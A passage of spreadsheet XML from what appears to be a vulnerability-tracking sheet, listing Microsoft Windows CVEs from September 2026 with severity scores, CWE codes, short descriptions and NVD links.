          <t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69458</t>
        </is>
      </c>
      <c r="D702" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F702" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr"/>
      <c r="Q702" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R702" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69462</t>
        </is>
      </c>
      <c r="D703" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F703" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr"/>
      <c r="Q703" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R703" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69481</t>
        </is>
      </c>
      <c r="D704" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F704" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr"/>
      <c r="Q704" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R704" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="D705" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F705" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K70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05" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr"/>
      <c r="Q705" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R705" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69505</t>
        </is>
      </c>
      <c r="D706" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F706" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K70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6" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr"/>
      <c r="Q706" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R706" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69512</t>
        </is>
      </c>
      <c r="D707" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F707" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr"/>
      <c r="Q707" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R707" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69619</t>
        </is>
      </c>
      <c r="D708" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F708" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr"/>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr"/>
      <c r="Q708" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R708" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69623</t>
        </is>
      </c>
      <c r="D709" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F709" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr"/>
      <c r="Q709" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R709" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69625</t>
        </is>
      </c>
      <c r="D710" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F710" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr"/>
      <c r="Q710" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R710" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69643</t>
        </is>
      </c>
      <c r="D711" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F711" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr"/>
      <c r="Q711" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R711" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69681</t>
        </is>
      </c>
      <c r="D712" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F712" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr"/>
      <c r="Q712" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R712" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69689</t>
        </is>
      </c>
      <c r="D713" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F713" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr"/>
      <c r="Q713" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="R713" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69714</t>
        </is>
      </c>
      <c r="D714" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F714" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr"/>
      <c r="Q714" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R714" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69717</t>
        </is>
      </c>
      <c r="D715" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F715" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr"/>
      <c r="Q715" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-822, CWE-843</t>
        </is>
      </c>
      <c r="R715" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="D716" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F716" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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16" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr"/>
      <c r="Q716" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R716" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69762</t>
        </is>
      </c>
      <c r="D717" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F717" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr"/>
      <c r="Q717" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R717" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="D718" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F718" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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18" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr"/>
      <c r="Q718" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R718" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69777</t>
        </is>
      </c>
      <c r="D719" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F719" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr"/>
      <c r="Q719" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R719" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t>
        </is>
      </c>
      <c r="S719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69807</t>
        </is>
      </c>
      <c r="D720" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F720" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
